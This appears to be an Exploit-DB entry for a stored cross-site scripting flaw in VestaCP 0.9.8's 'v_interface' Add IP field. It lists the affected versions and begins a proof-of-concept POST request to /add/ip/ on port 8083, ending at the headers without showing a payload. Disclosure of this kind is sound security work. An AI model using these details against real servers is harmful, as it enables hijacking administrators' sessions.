Vulnerability Details: - ID: EDB-49662 - CVE: N/A - Author: Numan Türe - Type: WebApps - Platform: Multiple - Date: 2021-03-18 - Application: VestaCP Vulnerability Description: - Title: VestaCP 0.9.8 - 'v_interface' Add IP Stored XSS - Date: 03.07.2021 - Author: Numan Türe - Vendor Homepage: https://vestacp.com - Software Links: - https://myvestacp.com < 0.9.8-26-43 - https://vestacp.com < 0.9.8-26 - Tested on: VestaCP HTTP Request: - Method: POST - URL: /add/ip/ HTTP/1.1 - Host: TARGET:8083 - Headers: - Connection: close - Content-Length: 165 - Cache-Control: max-age=0 - Origin: https://TARGET:8083 - Content-Type: application/x-www-form-urlencoded